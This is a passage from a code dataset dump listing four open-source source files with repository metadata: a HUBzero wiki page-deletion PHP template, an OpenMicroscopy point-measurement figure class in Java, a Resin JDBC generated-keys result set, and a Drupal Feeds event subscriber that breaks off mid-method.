code stringlengths 3 1.05M | repo_name stringlengths 4 116 | path stringlengths 4 991 | language stringclasses 9 values | license stringclasses 15 values | size int32 3 1.05M |
|---|---|---|---|---|---|
<?php
/**
* HUBzero CMS
*
* Copyright 2005-2015 HUBzero Foundation, LLC.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*
* HUBzero is a registered trademark of Purdue University.
*
* @package hubzero-cms
* @copyright Copyright 2005-2015 HUBzero Foundation, LLC.
* @license http://opensource.org/licenses/MIT MIT
*/
// No direct access.
defined('_HZEXEC_') or die();
if (!$this->sub)
{
$this->css();
}
?>
<header id="<?php echo ($this->sub) ? 'sub-content-header' : 'content-header'; ?>">
<?php if (count($this->parents)) { ?>
<p class="wiki-crumbs">
<?php foreach ($this->parents as $parent) { ?>
<a class="wiki-crumb" href="<?php echo Route::url($parent->link()); ?>"><?php echo $parent->title; ?></a> /
<?php } ?>
</p>
<?php } ?>
<h2><?php echo $this->escape($this->page->title); ?></h2>
<?php
if (!$this->page->isStatic())
{
$this->view('authors', 'pages')
//->setBasePath($this->base_path)
->set('page', $this->page)
->display();
}
?>
</header><!-- /#content-header -->
<?php if ($this->getError()) { ?>
<p class="error"><?php echo $this->getError(); ?></p>
<?php } ?>
<?php
$this->view('submenu', 'pages')
//->setBasePath($this->base_path)
->set('option', $this->option)
->set('controller', $this->controller)
->set('page', $this->page)
->set('task', $this->task)
->set('sub', $this->sub)
->display();
?>
<section class="main section">
<?php if ($this->page->isLocked() && !$this->page->access('manage')) { ?>
<p class="warning"><?php echo Lang::txt('COM_WIKI_WARNING_NOT_AUTH_EDITOR'); ?></p>
<?php } else { ?>
<form action="<?php echo Route::url($this->page->link('base')); ?>" method="post" id="hubForm">
<div class="explaination">
<p><?php echo Lang::txt('COM_WIKI_DELETE_PAGE_EXPLANATION'); ?></p>
</div>
<fieldset>
<legend><?php echo Lang::txt('COM_WIKI_DELETE_PAGE'); ?></legend>
<label for="confirm-delete">
<input class="option" type="checkbox" name="confirm" id="confirm-delete" value="1" />
<?php echo Lang::txt('COM_WIKI_FIELD_CONFIRM_DELETE'); ?>
</label>
<p class="warning">
<?php echo Lang::txt('COM_WIKI_FIELD_CONFIRM_DELETE_HINT'); ?>
</p>
<input type="hidden" name="pagename" value="<?php echo $this->escape(($this->page->get('path') ? $this->page->get('path') . '/' : '') . $this->page->get('pagename')); ?>" />
<input type="hidden" name="page_id" value="<?php echo $this->escape($this->page->get('id')); ?>" />
<?php foreach ($this->page->adapter()->routing('delete') as $name => $val) { ?>
<input type="hidden" name="<?php echo $this->escape($name); ?>" value="<?php echo $this->escape($val); ?>" />
<?php } ?>
<?php echo Html::input('token'); ?>
</fieldset><div class="clear"></div>
<p class="submit">
<input type="submit" class="btn btn-danger" value="<?php echo Lang::txt('COM_WIKI_DELETE'); ?>" />
</p>
</form>
<?php } ?>
</section><!-- / .main section -->
| drewthoennes/hubzero-cms | core/components/com_wiki/site/views/pages/tmpl/delete.php | PHP | gpl-2.0 | 3,987 |
/*
* org.openmicroscopy.shoola.util.roi.figures.MeasureEllipseFigure
*
*------------------------------------------------------------------------------
* Copyright (C) 2006-2013 University of Dundee. All rights reserved.
*
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
*------------------------------------------------------------------------------
*/
package org.openmicroscopy.shoola.util.roi.figures;
//Java imports
import java.awt.Font;
import java.awt.Graphics2D;
import java.awt.Point;
import java.awt.geom.AffineTransform;
import java.awt.geom.Point2D;
import java.awt.geom.Rectangle2D;
import java.text.DecimalFormat;
import java.text.NumberFormat;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
//Third-party libraries
import org.jhotdraw.draw.AbstractAttributedFigure;
import org.jhotdraw.draw.FigureListener;
//Application-internal dependencies
import org.openmicroscopy.shoola.util.roi.model.annotation.AnnotationKeys;
import org.openmicroscopy.shoola.util.roi.model.annotation.MeasurementAttributes;
import org.openmicroscopy.shoola.util.roi.figures.ROIFigure;
import org.openmicroscopy.shoola.util.roi.model.ROI;
import org.openmicroscopy.shoola.util.roi.model.ROIShape;
import org.openmicroscopy.shoola.util.roi.model.util.MeasurementUnits;
import org.openmicroscopy.shoola.util.ui.UIUtilities;
import org.openmicroscopy.shoola.util.ui.UnitsObject;
import org.openmicroscopy.shoola.util.ui.drawingtools.figures.FigureUtil;
import org.openmicroscopy.shoola.util.ui.drawingtools.figures.PointTextFigure;
/**
* Point with measurement.
*
* @author Jean-Marie Burel
* <a href="mailto:j.burel@dundee.ac.uk">j.burel@dundee.ac.uk</a>
* @author Donald MacDonald
* <a href="mailto:donald@lifesci.dundee.ac.uk">donald@lifesci.dundee.ac.uk</a>
* @version 3.0
* @since OME3.0
*/
public class MeasurePointFigure
extends PointTextFigure
implements ROIFigure
{
/** Flag indicating the figure can/cannot be deleted.*/
private boolean deletable;
/** Flag indicating the figure can/cannot be annotated.*/
private boolean annotatable;
/** Flag indicating the figure can/cannot be edited.*/
private boolean editable;
/** Is this figure read only. */
private boolean readOnly;
/** Is this figure a client object. */
private boolean clientObject;
/** has the figure been modified. */
private boolean dirty;
/**
* This is used to perform faster drawing and hit testing.
*/
private Rectangle2D bounds;
/** The ROI containing the ROIFigure which in turn contains this Figure. */
protected ROI roi;
/** The ROIFigure contains this Figure. */
protected ROIShape shape;
/** The Measurement units, and values of the image. */
private MeasurementUnits units;
/**
* The status of the figure i.e. {@link ROIFigure#IDLE} or
* {@link ROIFigure#MOVING}.
*/
private int status;
/** Flag indicating if the user can move or resize the shape.*/
private boolean interactable;
/** The units of reference.*/
private String refUnits;
/**
* Creates a new instance.
*
* @param text text of the ellipse.
* @param x coordinate of the figure.
* @param y coordinate of the figure.
* @param width of the figure.
* @param height of the figure.
* @param readOnly The figure is read only.
* @param clientObject The figure is created client-side.
* @param editable Flag indicating the figure can/cannot be edited.
* @param deletable Flag indicating the figure can/cannot be deleted.
* @param annotatable Flag indicating the figure can/cannot be annotated.
*/
public MeasurePointFigure(String text, double x, double y, double width,
double height, boolean readOnly, boolean clientObject,
boolean editable, boolean deletable, boolean annotatable)
{
super(text, x, y, width, height);
setAttributeEnabled(MeasurementAttributes.TEXT_COLOR, true);
setAttribute(MeasurementAttributes.FONT_FACE, DEFAULT_FONT);
setAttribute(MeasurementAttributes.FONT_SIZE, new Double(FONT_SIZE));
shape = null;
roi = null;
status = IDLE;
setReadOnly(readOnly);
setClientObject(clientObject);
this.deletable = deletable;
this.annotatable = annotatable;
this.editable = editable;
interactable = true;
refUnits = UnitsObject.MICRONS;
}
/**
* Creates a new instance.
*
* @param x coordinate of the figure.
* @param y coordinate of the figure.
* @param width of the figure.
* @param height of the figure.
*/
public MeasurePointFigure(double x, double y, double width, double height)
{
this(DEFAULT_TEXT, x, y, width, height, false, true, true, true, true);
}
/**
* Create an instance of the Point Figure.
* @param readOnly The figure is read only.
* @param clientObject The figure is created client-side.
* @param editable Flag indicating the figure can/cannot be edited.
* @param deletable Flag indicating the figure can/cannot be deleted.
* @param annotatable Flag indicating the figure can/cannot be annotated.
*/
public MeasurePointFigure(boolean readOnly, boolean clientObject,
boolean editable, boolean deletable, boolean annotatable)
{
this(DEFAULT_TEXT, 0, 0, 0, 0, readOnly, clientObject, editable,
deletable, annotatable);
}
/**
* Create an instance of the Point Figure.
*/
public MeasurePointFigure()
{
this(0, 0, 0, 0);
}
/**
* Get the X coordinate of the figure, convert to microns if isInMicrons set.
*
* @return see above.
*/
public double getMeasurementX()
{
if (units.isInMicrons()) {
return UIUtilities.transformSize(
getX()*units.getMicronsPixelX()).getValue();
}
return getX();
}
/**
* Get the centre of the figure, convert to microns if isInMicrons set.
*
* @return see above.
*/
public Point2D getMeasurementCentre()
{
if (units.isInMicrons()){
double tx = UIUtilities.transformSize(
getCentre().getX()*units.getMicronsPixelX()).getValue();
double ty = UIUtilities.transformSize(
getCentre().getY()*units.getMicronsPixelY()).getValue();
return new Point2D.Double(tx, ty);
}
return getCentre();
}
/**
* Get the Y coordinate of the figure, convert to microns if isInMicrons set.
*
* @return see above.
*/
public double getMeasurementY()
{
if (units.isInMicrons()) {
return UIUtilities.transformSize(
getY()*units.getMicronsPixelY()).getValue();
}
return getY();
}
/**
* Get the width of the figure, convert to microns if isInMicrons set.
*
* @return see above.
*/
public double getMeasurementWidth()
{
if (units.isInMicrons()) {
return UIUtilities.transformSize(
getWidth()*units.getMicronsPixelX()).getValue();
}
return getWidth();
}
/**
* Get the height of the figure, convert to microns if isInMicrons set.
*
* @return see above.
*/
public double getMeasurementHeight()
{
if (units.isInMicrons()) {
return UIUtilities.transformSize(
getHeight()*units.getMicronsPixelY()).getValue();
}
return getHeight();
}
/**
* Get the x coordinate of the figure.
* @return see above.
*/
public double getX() { return ellipse.getX(); }
/**
* Get the y coordinate of the figure.
* @return see above.
*/
public double getY() { return ellipse.getY(); }
/**
* Get the width coordinate of the figure.
* @return see above.
*/
public double getWidth() { return ellipse.getWidth(); }
/**
* Get the height coordinate of the figure.
* @return see above.
*/
public double getHeight() { return ellipse.getHeight(); }
/**
* Draw the figure on the graphics context.
* @param g the graphics context.
*/
public void draw(Graphics2D g)
{
super.draw(g);
if(MeasurementAttributes.SHOWMEASUREMENT.get(this) ||
MeasurementAttributes.SHOWID.get(this))
{
NumberFormat formatter = new DecimalFormat(FORMAT_PATTERN);
String pointCentre =
"("+formatter.format(getMeasurementCentre().getX())
+ ","+formatter.format(getMeasurementCentre().getY())+")";
double sz = ((Double) this.getAttribute(
MeasurementAttributes.FONT_SIZE));
g.setFont(new Font(FONT_FAMILY, FONT_STYLE, (int) sz));
bounds = g.getFontMetrics().getStringBounds(pointCentre, g);
bounds = new Rectangle2D.Double(
this.getBounds().getCenterX()-bounds.getWidth()/2,
this.getBounds().getCenterY()+bounds.getHeight()/2,
bounds.getWidth(), bounds.getHeight());
if (MeasurementAttributes.SHOWMEASUREMENT.get(this))
{
g.setColor(MeasurementAttributes.MEASUREMENTTEXT_COLOUR.get(this));
g.drawString(pointCentre, (int) bounds.getX(),
(int) bounds.getY());
}
if (MeasurementAttributes.SHOWID.get(this))
{
Rectangle2D bounds;
bounds = g.getFontMetrics().getStringBounds(getROI().getID()+"", g);
bounds = new Rectangle2D.Double(
getBounds().getCenterX()-bounds.getWidth()/2,
getBounds().getCenterY()+bounds.getHeight()/2,
bounds.getWidth(), bounds.getHeight());
g.setColor(this.getTextColor());
g.drawString(getROI().getID()+"", (int) bounds.getX(),
(int) bounds.getY());
}
}
}
/**
* Overridden to stop updating shape if read-only
* @see AbstractAttributedFigure#transform(AffineTransform)
*/
public void transform(AffineTransform tx)
{
if (!readOnly && interactable)
{
super.transform(tx);
this.setObjectDirty(true);
}
}
/**
* Overridden to stop updating shape if read-only.
* @see AbstractAttributedFigure#setBounds(Double, Double)
*/
public void setBounds(Point2D.Double anchor, Point2D.Double lead)
{
if (!readOnly && interactable)
{
super.setBounds(anchor, lead);
this.setObjectDirty(true);
}
}
/**
* Calculates the bounds of the rendered figure, including the text rendered.
* @return see above.
*/
public Rectangle2D.Double getDrawingArea()
{
Rectangle2D.Double newBounds = super.getDrawingArea();
if (bounds != null)
{
if (newBounds.getX() > bounds.getX())
{
double diff = newBounds.x-bounds.getX();
newBounds.x = bounds.getX();
newBounds.width = newBounds.width+diff;
}
if (newBounds.getY() > bounds.getY())
{
double diff = newBounds.y-bounds.getY();
newBounds.y = bounds.getY();
newBounds.height = newBounds.height+diff;
}
if (bounds.getX()+bounds.getWidth() >
newBounds.getX()+newBounds.getWidth())
{
double diff = bounds.getX()+bounds.getWidth()
-newBounds.getX()+newBounds.getWidth();
newBounds.width = newBounds.width+diff;
}
if (bounds.getY()+bounds.getHeight() >
newBounds.getY()+newBounds.getHeight())
{
double diff = bounds.getY()+bounds.getHeight()
-newBounds.getY()+newBounds.getHeight();
newBounds.height = newBounds.height+diff;
}
}
return newBounds;
}
/**
* Add units to the string
* @param str see above.
* @return returns the string with the units added.
*/
public String addUnits(String str)
{
if (shape == null) return str;
if (units.isInMicrons())
return str+refUnits+UIUtilities.SQUARED_SYMBOL;
return str+UIUtilities.PIXELS_SYMBOL+UIUtilities.SQUARED_SYMBOL;
}
/**
* Calculate the centre of the figure.
* @return see above.
*/
public Point2D getCentre()
{
return new Point2D.Double(Math.round(ellipse.getCenterX()),
Math.round(ellipse.getCenterY()));
}
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getROI()
*/
public ROI getROI() { return roi; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getROIShape()
*/
public ROIShape getROIShape() { return shape; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#setROI(ROI)
*/
public void setROI(ROI roi) { this.roi = roi; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#setROIShape(ROIShape)
*/
public void setROIShape(ROIShape shape) { this.shape = shape; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getType()
*/
public void calculateMeasurements()
{
if (shape == null) return;
AnnotationKeys.CENTREX.set(shape, getMeasurementCentre().getX());
AnnotationKeys.CENTREY.set(shape, getMeasurementCentre().getY());
}
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getType()
*/
public String getType() { return FigureUtil.POINT_TYPE; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#setMeasurementUnits(MeasurementUnits)
*/
public void setMeasurementUnits(MeasurementUnits units)
{
this.units = units;
refUnits = UIUtilities.transformSize(
units.getMicronsPixelX()).getUnits();
}
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getPoints()
*/
public List<Point> getPoints()
{
return Arrays.asList(new Point((int) ellipse.getCenterX(),
(int) ellipse.getCenterY()));
}
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getSize()
*/
public int getSize() { return 1; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#setStatus(boolean)
*/
public void setStatus(int status) { this.status = status; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#getStatus()
*/
public int getStatus() { return status; }
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#isReadOnly()
*/
public boolean isReadOnly() { return readOnly;}
/**
* Implemented as specified by the {@link ROIFigure} interface.
* @see ROIFigure#setReadOnly(boolean)
*/
public void setReadOnly(boolean readOnly)
{
this.readOnly = readOnly;
setEditable(!readOnly);
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#isClientObject()
*/
public boolean isClientObject()
{
return clientObject;
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#setClientObject(boolean)
*/
public void setClientObject(boolean clientSide)
{
clientObject = clientSide;
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#isDirty()
*/
public boolean isDirty()
{
return dirty;
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#setObjectDirty(boolean)
*/
public void setObjectDirty(boolean dirty)
{
this.dirty = dirty;
}
/**
* Clones the figure.
* @see MeasurePointFigure#clone()
*/
public MeasurePointFigure clone()
{
MeasurePointFigure that = (MeasurePointFigure) super.clone();
that.setReadOnly(this.isReadOnly());
that.setClientObject(this.isClientObject());
that.setObjectDirty(true);
that.setInteractable(true);
return that;
}
/**
* Marks the object as dirty.
* @see MeasurePointFigure#setText(String)
*/
public void setText(String text)
{
super.setText(text);
this.setObjectDirty(true);
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#getFigureListeners()
*/
public List<FigureListener> getFigureListeners()
{
List<FigureListener> figListeners = new ArrayList<FigureListener>();
Object[] listeners = listenerList.getListenerList();
for (Object listener : listeners)
if (listener instanceof FigureListener)
figListeners.add((FigureListener) listener);
return figListeners;
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#canAnnotate()
*/
public boolean canAnnotate() { return annotatable; }
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#canDelete()
*/
public boolean canDelete() { return deletable; }
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#canAnnotate()
*/
public boolean canEdit() { return editable; }
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#setInteractable(boolean)
*/
public void setInteractable(boolean interactable)
{
this.interactable = interactable;
}
/**
* Implemented as specified by the {@link ROIFigure} interface
* @see ROIFigure#canInteract()
*/
public boolean canInteract() { return interactable; }
} | jballanc/openmicroscopy | components/insight/SRC/org/openmicroscopy/shoola/util/roi/figures/MeasurePointFigure.java | Java | gpl-2.0 | 19,396 |
/*
* Copyright (c) 1998-2012 Caucho Technology -- all rights reserved
*
* This file is part of Resin(R) Open Source
*
* Each copy or derived work must preserve the copyright notice and this
* notice unmodified.
*
* Resin Open Source is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* Resin Open Source is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE, or any warranty
* of NON-INFRINGEMENT. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License
* along with Resin Open Source; if not, write to the
* Free SoftwareFoundation, Inc.
* 59 Temple Place, Suite 330
* Boston, MA 02111-1307 USA
*
* @author Scott Ferguson
*/
package com.caucho.db.jdbc;
import com.caucho.db.sql.Data;
import com.caucho.db.table.Column;
import java.io.InputStream;
import java.io.Reader;
import java.sql.NClob;
import java.sql.RowId;
import java.sql.SQLException;
import java.sql.SQLXML;
import java.sql.Statement;
import java.util.ArrayList;
/**
* The JDBC statement implementation.
*/
public class GeneratedKeysResultSet extends AbstractResultSet {
private ArrayList<Data> _keys = new ArrayList<Data>();
private Statement _stmt;
private int _row;
/**
* Initialize the keys result set at the beginning of the query.
*/
public void init(Statement stmt)
{
_stmt = stmt;
_row = 0;
}
/**
* Initialize the keys result set at the beginning of the query.
*/
public void init()
{
_row = 0;
}
/**
* Returns the statement associated with the keys.
*/
@Override
public java.sql.Statement getStatement()
throws SQLException
{
return _stmt;
}
@Override
public java.sql.ResultSetMetaData getMetaData()
throws SQLException
{
return null;
}
@Override
public boolean next()
throws SQLException
{
return _row++ == 0;
}
@Override
public boolean wasNull()
throws SQLException
{
return false;
}
/**
* Returns the index for the given column name.
*/
@Override
public int findColumn(String columnName)
throws SQLException
{
for (int i = 0; i < _keys.size(); i++) {
Column column = _keys.get(i).getColumn();
if (column.getName().equals(columnName))
return i + 1;
}
throw new SQLException(L.l("`{0}' is an unknown column.", columnName));
}
/**
* Sets the specified column.
*/
public void setColumn(int index, Column column)
{
Data data = addData(index);
data.setColumn(column);
}
/**
* Returns the generated string key.
*/
@Override
public String getString(int columnIndex)
throws SQLException
{
Data data = _keys.get(columnIndex - 1);
return data.getString();
}
/**
* Sets the generated string key.
*/
public void setString(int columnIndex, String value)
throws SQLException
{
Data data = addData(columnIndex);
data.setString(value);
}
/**
* Returns the generated integer key.
*/
@Override
public int getInt(int columnIndex)
throws SQLException
{
Data data = _keys.get(columnIndex - 1);
return data.getInt();
}
/**
* Sets the generated int key.
*/
public void setInt(int columnIndex, int value)
throws SQLException
{
Data data = addData(columnIndex);
data.setInt(value);
}
/**
* Returns the generated long key.
*/
@Override
public long getLong(int columnIndex)
throws SQLException
{
Data data = _keys.get(columnIndex - 1);
return data.getLong();
}
/**
* Sets the generated long key.
*/
public void setLong(int columnIndex, long value)
throws SQLException
{
Data data = addData(columnIndex);
data.setLong(value);
}
/**
* Extends the capacity for the data.
*/
private Data addData(int columnIndex)
{
for (int i = _keys.size(); i < columnIndex; i++)
_keys.add(new Data());
return _keys.get(columnIndex - 1);
}
public void close()
{
_stmt = null;
}
public RowId getRowId(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public RowId getRowId(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateRowId(int columnIndex, RowId x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateRowId(String columnLabel, RowId x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public int getHoldability() throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public boolean isClosed() throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNString(int columnIndex, String nString) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNString(String columnLabel, String nString) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(int columnIndex, NClob nClob) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(String columnLabel, NClob nClob) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public NClob getNClob(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public NClob getNClob(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public SQLXML getSQLXML(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public SQLXML getSQLXML(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateSQLXML(int columnIndex, SQLXML xmlObject) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateSQLXML(String columnLabel, SQLXML xmlObject) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public String getNString(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public String getNString(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public Reader getNCharacterStream(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public Reader getNCharacterStream(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(int columnIndex, Reader x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(int columnIndex, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(int columnIndex, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(int columnIndex, Reader x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(String columnLabel, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(String columnLabel, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(int columnIndex, InputStream inputStream, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(String columnLabel, InputStream inputStream, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(int columnIndex, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(int columnIndex, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(int columnIndex, Reader x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(int columnIndex, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(int columnIndex, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(int columnIndex, Reader x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(String columnLabel, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(String columnLabel, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(int columnIndex, InputStream inputStream) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(String columnLabel, InputStream inputStream) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(int columnIndex, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(int columnIndex, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public <T> T unwrap(Class<T> iface) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public boolean isWrapperFor(Class<?> iface) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
@Override
public String toString()
{
return getClass().getSimpleName() + _keys;
}
}
| mdaniel/svn-caucho-com-resin | modules/resin/src/com/caucho/db/jdbc/GeneratedKeysResultSet.java | Java | gpl-2.0 | 12,600 |
<?php
namespace Drupal\feeds\EventSubscriber;
use Drupal\feeds\Event\ClearEvent;
use Drupal\feeds\Event\ExpireEvent;
use Drupal\feeds\Event\FeedsEvents;
use Drupal\feeds\Event\FetchEvent;
use Drupal\feeds\Event\InitEvent;
use Drupal\feeds\Event\ParseEvent;
use Drupal\feeds\Event\ProcessEvent;
use Drupal\feeds\Plugin\Type\ClearableInterface;
use Drupal\feeds\StateInterface;
use Symfony\Component\EventDispatcher\EventDispatcherInterface;
use Symfony\Component\EventDispatcher\EventSubscriberInterface;
/**
* Event listener that registers Feeds plugins as event listeners.
*/
class LazySubscriber implements EventSubscriberInterface {
/**
* Wether the import listeners have been added.
*
* @var array
*/
protected $importInited = [];
/**
* Wether the clear listeners have been added.
*
* @var bool
*/
protected $clearInited = FALSE;
/**
* Wether the expire listeners have been added.
*
* @var bool
*/
protected $expireInited = FALSE;
/**
* {@inheritdoc}
*/
public static function getSubscribedEvents() {
$events = [];
$events[FeedsEvents::INIT_IMPORT][] = 'onInitImport';
$events[FeedsEvents::INIT_CLEAR][] = 'onInitClear';
$events[FeedsEvents::INIT_EXPIRE][] = 'onInitExpire';
return $events;
}
/**
* Adds import plugins as event listeners.
*/
public function onInitImport(InitEvent $event, $event_name, EventDispatcherInterface $dispatcher) {
$stage = $event->getStage();
if (isset($this->importInited[$stage])) {
return;
}
$this->importInited[$stage] = TRUE;
switch ($stage) {
case 'fetch':
$dispatcher->addListener(FeedsEvents::FETCH, function(FetchEvent $event) {
$feed = $event->getFeed();
$result = $feed->getType()->getFetcher()->fetch($feed, $feed->getState(StateInterface::FETCH));
$event->setFetcherResult($result);
});
break;
case 'parse':
$dispatcher->addListener(FeedsEvents::PARSE, function(ParseEvent $event) {
$feed = $event->getFeed();
$result = $feed
->getType()
->getParser()
->parse($feed, $event->getFetcherResult(), $feed->getState(StateInterface::PARSE));
$event->setParserResult($result);
});
break;
case 'process':
$dispatcher->addListener(FeedsEvents::PROCESS, function(ProcessEvent $event) {
$feed = $event->getFeed();
$feed
->getType()
->getProcessor()
->process($feed, $event->getParserResult(), $feed->getState(StateInterface::PROCESS));
});
break;
}
}
/**
* Adds clear plugins as event listeners.
*/
public function onInitClear(InitEvent $event, $event_name, EventDispatcherInterface $dispatcher) {
if ($this->clearInited === TRUE) {
return;
}
$this->clearInited = TRUE;
foreach ($event->getFeed()->getType()->getPlugins() as $plugin) {
if (!$plugin instanceof ClearableInterface) {
continue;
}
$dispatcher->addListener(FeedsEvents::CLEAR, function(ClearEvent $event) use ($plugin) {
$feed = $event->getFeed();
$plugin->clear($feed, $feed->getState(StateInterface::CLEAR));
});
}
}
/**
* Adds expire plugins as event listeners.
*/
public function onInitExpire(InitEvent $event, $event_name, EventDispatcherInterface $dispatcher) {
if ($this->expireInited === TRUE) {
return;
}
$this->expireInited = TRUE;
